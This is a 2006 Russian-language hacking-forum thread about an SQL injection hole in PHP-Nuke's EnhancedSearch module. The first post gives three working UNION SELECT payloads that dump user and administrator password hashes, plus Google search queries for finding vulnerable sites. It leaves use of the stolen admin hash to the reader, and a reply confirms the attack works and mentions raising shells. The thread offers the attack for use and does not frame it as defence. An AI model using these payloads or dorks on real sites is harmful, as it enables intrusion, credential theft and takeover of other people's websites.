ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Перезагрузить страницу phpnuke SQL Inj ALL VERSIONS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

phpnuke SQL Inj ALL VERSIONS
  #1  
Старый 12.05.2006, 00:59
LoFFi
Участник форума
Регистрация: 21.02.2006
Сообщений: 285
Провел на форуме:
1347867

Репутация: 408
Отправить сообщение для LoFFi с помощью ICQ
По умолчанию phpnuke SQL Inj ALL VERSIONS
Бага найдена в модуле поиска (EnhancedSearch).

Ввести в поиске :
EnhancedSearch%') UNION SELECT 0,user_id,username,user_password,0,0,0,0,0,0 FROM nuke_users/*

EnhancedSearch%') UNION SELECT 0,pwd,name,aid,0,0,0,0,0,0 FROM nuke_authors/*

EnhancedSearch%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*

И получим хеш админа.
А что с ним делать, это уже ваше дело )))


Небольшие запросы для гугла )
"Enhanced Search Version 2.0: Powered by"

inurl:"modules.php?name=EnhancedSearch"


Источник : security.nnov.ru
 
Ответить с цитированием

  #2  
Старый 12.05.2006, 01:45
_link
Новичок
Регистрация: 28.02.2006
Сообщений: 28
Провел на форуме:
225855

Репутация: 2
По умолчанию
Все верно, все работает. Дает хэши админа и других юзеров.
На этом можно туеву хучу шеллов поднять.
 
Ответить с цитированием

  #3  
Старый 12.05.2006, 02:16
syntacsis
Участник форума
Регистрация: 14.11.2005
Сообщений: 146
Провел на форуме:
981128

Репутация: 43
По умолчанию
LoFFi, наверно хорошо, что скинул. Может кому пригодится. Но нюку лучше на месте смотреть. Скрипткиддинг такой только на самых запущенных движках проходит.
Кстати, эта бага кажись в середине апреля была в nnov опубликована. Известна стала широкому кругу (ну тем, кто нюкой занимается) пораньше. Много с неё сложно поймать.
http://www.lock-team.ru/news/world_news/38.html (это далеко не первоисточник, просто первое что по запросу вышло)
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ